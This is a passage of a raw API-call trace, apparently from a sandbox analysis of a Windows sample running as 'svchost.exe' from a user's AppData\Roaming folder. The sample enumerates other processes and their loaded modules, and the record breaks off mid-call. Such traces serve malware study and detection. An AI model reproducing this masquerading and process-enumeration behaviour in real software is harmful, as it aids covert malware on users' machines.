[0073.657] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.657] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8aa0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")) returned 0x33 [0073.661] CoTaskMemFree (pv=0xd93200) [0073.661] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a90000, lpmodinfo=0x2491a18, cb=0x18 | out: lpmodinfo=0x2491a18*(lpBaseOfDll=0x7fef8a90000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0073.665] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.665] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a90000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-core-localization-l1-2-0.dll") returned 0x27 [0073.670] CoTaskMemFree (pv=0xd93200) [0073.670] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.670] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a90000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")) returned 0x3b [0073.674] CoTaskMemFree (pv=0xd93200) [0073.674] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9210000, lpmodinfo=0x2493c48, cb=0x18 | out: lpmodinfo=0x2493c48*(lpBaseOfDll=0x7fef9210000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0073.678] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.678] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9210000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-core-synch-l1-2-0.dll") returned 0x20 [0073.686] CoTaskMemFree (pv=0xd93200) [0073.686] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.686] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9210000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x34 [0073.691] CoTaskMemFree (pv=0xd93200) [0073.691] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a80000, lpmodinfo=0x2495e68, cb=0x18 | out: lpmodinfo=0x2495e68*(lpBaseOfDll=0x7fef8a80000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0073.695] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.695] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a80000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-core-processthreads-l1-1-1.dll") returned 0x29 [0073.699] CoTaskMemFree (pv=0xd93200) [0073.699] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.699] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a80000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 0x3d [0073.703] CoTaskMemFree (pv=0xd93200) [0073.703] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a70000, lpmodinfo=0x24980a8, cb=0x18 | out: lpmodinfo=0x24980a8*(lpBaseOfDll=0x7fef8a70000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0073.707] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.707] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a70000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-core-file-l1-2-0.dll") returned 0x1f [0073.712] CoTaskMemFree (pv=0xd93200) [0073.712] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.712] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a70000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")) returned 0x33 [0073.716] CoTaskMemFree (pv=0xd93200) [0073.716] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a60000, lpmodinfo=0x249a2b8, cb=0x18 | out: lpmodinfo=0x249a2b8*(lpBaseOfDll=0x7fef8a60000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0073.720] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.720] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a60000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-crt-heap-l1-1-0.dll") returned 0x1e [0073.725] CoTaskMemFree (pv=0xd93200) [0073.725] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.725] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a60000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")) returned 0x32 [0073.736] CoTaskMemFree (pv=0xd93200) [0073.736] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a50000, lpmodinfo=0x249c4c8, cb=0x18 | out: lpmodinfo=0x249c4c8*(lpBaseOfDll=0x7fef8a50000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0073.740] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.740] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a50000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-crt-string-l1-1-0.dll") returned 0x20 [0073.745] CoTaskMemFree (pv=0xd93200) [0073.745] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.745] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a50000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")) returned 0x34 [0073.749] CoTaskMemFree (pv=0xd93200) [0073.749] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a40000, lpmodinfo=0x249e6e8, cb=0x18 | out: lpmodinfo=0x249e6e8*(lpBaseOfDll=0x7fef8a40000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0073.754] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.754] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a40000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-crt-stdio-l1-1-0.dll") returned 0x1f [0073.757] CoTaskMemFree (pv=0xd93200) [0073.757] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.757] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a40000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 0x33 [0073.761] CoTaskMemFree (pv=0xd93200) [0073.761] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8a30000, lpmodinfo=0x24a08f8, cb=0x18 | out: lpmodinfo=0x24a08f8*(lpBaseOfDll=0x7fef8a30000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0073.764] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.764] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8a30000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-crt-convert-l1-1-0.dll") returned 0x21 [0073.768] CoTaskMemFree (pv=0xd93200) [0073.768] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.768] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8a30000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")) returned 0x35 [0073.771] CoTaskMemFree (pv=0xd93200) [0073.771] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc130000, lpmodinfo=0x24a2b18, cb=0x18 | out: lpmodinfo=0x24a2b18*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0073.775] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.775] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc130000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0073.781] CoTaskMemFree (pv=0xd93200) [0073.781] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.781] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc130000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0073.784] CoTaskMemFree (pv=0xd93200) [0073.784] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd830000, lpmodinfo=0x24a4cd8, cb=0x18 | out: lpmodinfo=0x24a4cd8*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0073.788] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.788] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0073.792] CoTaskMemFree (pv=0xd93200) [0073.792] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.792] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0073.795] CoTaskMemFree (pv=0xd93200) [0073.795] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb720000, lpmodinfo=0x24a6ec0, cb=0x18 | out: lpmodinfo=0x24a6ec0*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0073.799] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.799] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb720000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0073.802] CoTaskMemFree (pv=0xd93200) [0073.802] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.802] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb720000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0073.806] CoTaskMemFree (pv=0xd93200) [0073.806] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb4e0000, lpmodinfo=0x24a94a8, cb=0x18 | out: lpmodinfo=0x24a94a8*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0073.809] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.809] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb4e0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0073.813] CoTaskMemFree (pv=0xd93200) [0073.813] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.813] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb4e0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0073.817] CoTaskMemFree (pv=0xd93200) [0073.817] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbc60000, lpmodinfo=0x24ab678, cb=0x18 | out: lpmodinfo=0x24ab678*(lpBaseOfDll=0x7fefbc60000, SizeOfImage=0x35000, EntryPoint=0x7fefbc61064)) returned 1 [0073.820] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.821] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbc60000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="XmlLite.dll") returned 0xb [0073.826] CoTaskMemFree (pv=0xd93200) [0073.826] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.826] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbc60000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\XmlLite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")) returned 0x1f [0073.830] CoTaskMemFree (pv=0xd93200) [0073.830] CloseHandle (hObject=0x214) returned 1 [0073.839] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0073.839] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb20) returned 0x214 [0073.839] EnumProcessModules (in: hProcess=0x214, lphModule=0x24af298, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24af298, lpcbNeeded=0x23ee40) returned 1 [0073.840] GetModuleInformation (in: hProcess=0x214, hModule=0xe0000, lpmodinfo=0x24af508, cb=0x18 | out: lpmodinfo=0x24af508*(lpBaseOfDll=0xe0000, SizeOfImage=0x17000, EntryPoint=0xe14a1)) returned 1 [0073.840] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.840] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xe0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0073.840] CoTaskMemFree (pv=0xd910e0) [0073.841] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.841] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xe0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\absolutetelnet.exe" (normalized: "c:\\program files\\windowspowershell\\absolutetelnet.exe")) returned 0x35 [0073.841] CoTaskMemFree (pv=0xd910e0) [0073.841] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24b1740, cb=0x18 | out: lpmodinfo=0x24b1740*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.841] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.841] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.842] CoTaskMemFree (pv=0xd910e0) [0073.842] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.842] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.843] CoTaskMemFree (pv=0xd910e0) [0073.843] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24b3900, cb=0x18 | out: lpmodinfo=0x24b3900*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.843] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.843] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.843] CoTaskMemFree (pv=0xd910e0) [0073.844] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.844] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.844] CoTaskMemFree (pv=0xd910e0) [0073.844] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24b5ac0, cb=0x18 | out: lpmodinfo=0x24b5ac0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.845] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.845] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.845] CoTaskMemFree (pv=0xd910e0) [0073.845] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.845] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.846] CoTaskMemFree (pv=0xd910e0) [0073.846] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24b7c90, cb=0x18 | out: lpmodinfo=0x24b7c90*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.846] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.846] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.847] CoTaskMemFree (pv=0xd910e0) [0073.847] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.847] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.848] CoTaskMemFree (pv=0xd910e0) [0073.848] CloseHandle (hObject=0x214) returned 1 [0073.849] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0073.849] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x214 [0073.849] EnumProcessModules (in: hProcess=0x214, lphModule=0x24ba3b0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24ba3b0, lpcbNeeded=0x23ee40) returned 1 [0073.850] GetModuleInformation (in: hProcess=0x214, hModule=0x2f0000, lpmodinfo=0x24ba620, cb=0x18 | out: lpmodinfo=0x24ba620*(lpBaseOfDll=0x2f0000, SizeOfImage=0x17000, EntryPoint=0x2f14a1)) returned 1 [0073.850] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.850] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x2f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="skype.exe") returned 0x9 [0073.851] CoTaskMemFree (pv=0xd910e0) [0073.851] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.851] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x2f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft SQL Server\\skype.exe" (normalized: "c:\\program files (x86)\\microsoft sql server\\skype.exe")) returned 0x35 [0073.851] CoTaskMemFree (pv=0xd910e0) [0073.851] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24bc848, cb=0x18 | out: lpmodinfo=0x24bc848*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.851] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.851] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.852] CoTaskMemFree (pv=0xd910e0) [0073.852] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.852] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.852] CoTaskMemFree (pv=0xd910e0) [0073.852] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24bea08, cb=0x18 | out: lpmodinfo=0x24bea08*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.854] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.854] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.854] CoTaskMemFree (pv=0xd910e0) [0073.854] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.854] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.855] CoTaskMemFree (pv=0xd910e0) [0073.855] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24c0bc8, cb=0x18 | out: lpmodinfo=0x24c0bc8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.855] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.855] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.856] CoTaskMemFree (pv=0xd910e0) [0073.856] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.856] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.857] CoTaskMemFree (pv=0xd910e0) [0073.857] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24c2db0, cb=0x18 | out: lpmodinfo=0x24c2db0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.857] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.857] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.858] CoTaskMemFree (pv=0xd910e0) [0073.858] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.858] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.859] CoTaskMemFree (pv=0xd910e0) [0073.859] CloseHandle (hObject=0x214) returned 1 [0073.860] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0073.860] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x214 [0073.860] EnumProcessModules (in: hProcess=0x214, lphModule=0x24c54d0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24c54d0, lpcbNeeded=0x23ee40) returned 1 [0073.860] GetModuleInformation (in: hProcess=0x214, hModule=0xd80000, lpmodinfo=0x24c5740, cb=0x18 | out: lpmodinfo=0x24c5740*(lpBaseOfDll=0xd80000, SizeOfImage=0x17000, EntryPoint=0xd814a1)) returned 1 [0073.861] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.861] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xd80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="recentanalysis.exe") returned 0x12 [0073.861] CoTaskMemFree (pv=0xd910e0) [0073.861] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.861] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xd80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Java\\recentanalysis.exe" (normalized: "c:\\program files\\java\\recentanalysis.exe")) returned 0x28 [0073.862] CoTaskMemFree (pv=0xd910e0) [0073.862] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24c7960, cb=0x18 | out: lpmodinfo=0x24c7960*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.862] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.862] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.863] CoTaskMemFree (pv=0xd910e0) [0073.863] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.863] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.863] CoTaskMemFree (pv=0xd910e0) [0073.863] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24c9b20, cb=0x18 | out: lpmodinfo=0x24c9b20*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.864] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.864] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.864] CoTaskMemFree (pv=0xd910e0) [0073.864] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.864] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.865] CoTaskMemFree (pv=0xd910e0) [0073.865] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24cbce0, cb=0x18 | out: lpmodinfo=0x24cbce0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.865] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.865] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.866] CoTaskMemFree (pv=0xd910e0) [0073.866] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.866] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.866] CoTaskMemFree (pv=0xd910e0) [0073.866] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24cdeb0, cb=0x18 | out: lpmodinfo=0x24cdeb0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.867] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.867] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.868] CoTaskMemFree (pv=0xd910e0) [0073.868] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.868] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.868] CoTaskMemFree (pv=0xd910e0) [0073.868] CloseHandle (hObject=0x214) returned 1 [0073.874] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0073.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x214 [0073.875] EnumProcessModules (in: hProcess=0x214, lphModule=0x24d05d0, cb=0x200, 